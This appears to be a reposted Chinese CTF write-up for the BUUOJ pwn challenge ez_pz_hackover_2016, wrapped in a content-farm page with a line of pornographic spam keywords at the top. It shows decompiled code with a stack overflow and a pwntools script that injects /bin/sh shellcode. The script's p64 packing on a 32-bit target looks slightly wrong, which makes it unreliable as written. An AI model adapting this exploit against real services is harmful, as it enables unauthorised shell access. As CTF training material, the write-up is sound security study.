国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

ez_pz_hackover_2016

這篇具有很好參考價值的文章主要介紹了ez_pz_hackover_2016。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

ez_pz_hackover_2016

Arch:     i386-32-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

32位,保護全關

int chall()
{
  size_t v0; // eax
  int result; // eax
  char s[1024]; // [esp+Ch] [ebp-40Ch] BYREF
  _BYTE *v3; // [esp+40Ch] [ebp-Ch]

  printf("Yippie, lets crash: %p\n", s);
  printf("Whats your name?\n");
  printf("> ");
  fgets(s, 1023, stdin);
  v0 = strlen(s);
  v3 = memchr(s, 10, v0);
  if ( v3 )
    *v3 = 0;
  printf("\nWelcome %s!\n", s);
  result = strcmp(s, "crashme");
  if ( !result )
    return vuln((char)s, 0x400u);
  return result;
}

這里不存在漏洞點

void *__cdecl vuln(char src, size_t n)
{
  char dest[50]; // [esp+6h] [ebp-32h] BYREF

  return memcpy(dest, &src, n);
}

漏洞點在這里,通過上面輸入的數(shù)據(jù)傳進這里并執(zhí)行棧

思路

我們需要計算不同函數(shù)棧的距離

需要繞過strcmp和memchr,\x00均可繞過,答案就呼之欲出了,

調好偏移,使返回地址指向shellcode就可以getshell了

參考

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",27018,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x8048600')

sc=b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
leak=get_addr_int()-(0x1c)
pl=b'crashme\x00'+b'a'*(0x12)+p64(leak)+sc
sla(b'> ',pl)

ia()

ez_pz_hackover_2016,Buuoj刷題,安全文章來源地址http://www.zghlxwxcb.cn/news/detail-714457.html

到了這里,關于ez_pz_hackover_2016的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯(lián)網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • [SWPUCTF 2022 新生賽]ez_ez_php

    [SWPUCTF 2022 新生賽]ez_ez_php

    這段代碼是一個簡單的PHP文件處理腳本。讓我們逐行進行分析: error_reporting(0); ?- 這行代碼設置了錯誤報告的級別為0,意味著不顯示任何錯誤。 if (isset($_GET[\\\'file\\\'])) { ?- 這行代碼檢查是否存在一個名為\\\"file\\\"的GET參數(shù)。 if ( substr($_GET[\\\"file\\\"], 0, 3) === \\\"php\\\" ) { ?- 這行代碼使用 su

    2024年02月12日
    瀏覽(17)
  • [FSCTF 2023]EZ_eval

    [FSCTF 2023]EZ_eval

    ? ? 這道題關鍵就是過濾了?號和空格還有eval執(zhí)行時用了php的結束標志表示php代碼到此為止了,那不行啊我后面的參數(shù)還等著被執(zhí)行呢…… 可以用php短標簽,有三種方式: ? ? echo \\\'123\\\';? #前提是開啟配置參數(shù)short_open_tags=on ?? ? script language=\\\"php\\\"echo \\\'hello\\\'; #不需要修改參數(shù)

    2024年02月08日
    瀏覽(26)
  • FPGA面試筆記ea-ez

    FPGA面試筆記ea-ez

    FIFO Generator核有兩種讀模式:Standard FIFO(標準模式)、First Word Fall Through(FWFT模式) FWFT模式類似于QuartusⅡ軟件中FIFO的超前輸出模式,沒有讀延時。 注:如果選擇標準模式,勾選Output Registers,會增加一個讀延時;但是選擇FWFT模式,勾選Output Registers,仍然沒有讀延時; 風扇

    2024年02月21日
    瀏覽(24)
  • [SWPUCTF 2021 新生賽]ez_unserialize

    [SWPUCTF 2021 新生賽]ez_unserialize

    題目在哪呢?查看源代碼試試 User-agent: * Disallow: 什么東西呢 發(fā)現(xiàn)disallow Robots 協(xié)議(也稱為爬蟲協(xié)議、機器人協(xié)議等)的全稱是 “網絡爬蟲排除標準”(Robots Exclusion Protocol),網站通過 Robots 協(xié)議告訴搜索引擎哪些頁面可抓,哪些頁面不能抓。 disallow就是爬蟲不能搜索的所以

    2024年02月05日
    瀏覽(11)
  • 普中STM32-PZ6806L開發(fā)板(有點悲傷的故事續(xù)-人燈還未了)

    普中STM32-PZ6806L開發(fā)板(有點悲傷的故事續(xù)-人燈還未了)

    繼上篇 普中STM32-PZ6806L開發(fā)板(有點悲傷的故事) 說到 關于 普中STM32-PZ6806L開發(fā)板的LED流水燈也被燒壞掉了,再也無法玩流水燈, 內心充滿了只會流水燈的不甘, 流水燈就是單片機的Hello World,怎么能沒有呢? 好巧不巧想起最近電磁爐壞掉啦,這不是《歇后語》省略…, 拆掉了電

    2024年01月20日
    瀏覽(14)
  • [GFCTF 2021]ez_calc day3

    [GFCTF 2021]ez_calc day3

    目錄 此時我腦袋產生了幾個問題:? 但是嘗試了幾個弱密碼發(fā)現(xiàn)不對,找一下有沒有代碼泄露的點。 ?咦發(fā)現(xiàn)ctrl+u查看的源碼和f12顯示的竟然不一樣我丟,漲知識了。 js大小寫有漏洞之前遇見過 ?條件就是: 在Character.toUpperCase()函數(shù)中,字符?會轉變?yōu)镮,字符?會變?yōu)镾。 在

    2024年02月09日
    瀏覽(32)
  • NSS [UUCTF 2022 新生賽]ez_upload

    NSS [UUCTF 2022 新生賽]ez_upload

    考點:Apache解析漏洞 開題就是標準的上傳框 起手式就是傳入一個php文件,非常正常的有過濾。 .txt 、 .user.ini 、 .txxx 都被過濾了,應該是白名單或者黑名單加MIME過濾,只允許 .jpg 、 .png 。 猜測二次渲染,傳了圖片馬上去,但是沒什么用,還抓不到包了。 network看了一下報文

    2024年02月13日
    瀏覽(24)
  • 【STM32】--PZ6860L,STM32F4,ARM3.0開發(fā)板

    【STM32】--PZ6860L,STM32F4,ARM3.0開發(fā)板

    (1)各種外設和主板原理圖 (2)主板供電部分5V和3.3V兼容設計 注意跳線帽 STM32和51的IO對應關系 下載電路 其實啟動2次。 一次從系統(tǒng)區(qū)啟動,一次從用戶Flash啟動。 第一步:先設置BOOT1和BOOT0從系統(tǒng)區(qū)【系統(tǒng)存儲器】啟動,執(zhí)行系統(tǒng)中預設的程序 第二步:主機(電腦)通過

    2024年02月07日
    瀏覽(22)
  • [GDOUCTF 2023]<ez_ze> SSTI 過濾數(shù)字 大括號{等

    [GDOUCTF 2023]<ez_ze> SSTI 過濾數(shù)字 大括號{等

    SSTI模板注入-中括號、args、下劃線、單雙引號、os、request、花括號、數(shù)字被過濾繞過(ctfshow web入門370)-CSDN博客 ssti板塊注入 正好不會 {%%}的內容 學習一下 經過測試 發(fā)現(xiàn)過濾了 {{}} 那么我們就開始吧 我們可以通過這個語句來查詢是否存在ssti ? 存在咯 這里跟著師傅的wp走

    2024年02月06日
    瀏覽(45)
  • 二、賽普拉斯EZ-USB FX3示例燒錄驗證

    二、賽普拉斯EZ-USB FX3示例燒錄驗證

    一、簡介 ? ? ? ? ? ? ? ? ?本人使用的是CYUSB3KIT-003開發(fā)板,之后的示例也是基于上面驗證的。 圖1.0開發(fā)板實物圖 二、驅動安裝 ? ? ? ? 步驟: ① 把開發(fā)板的跳線帽都接上。 ??????????????????? ② 把USB3.0線插入開發(fā)板,另一端連接電腦,此時會有一個電源燈亮

    2024年02月09日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包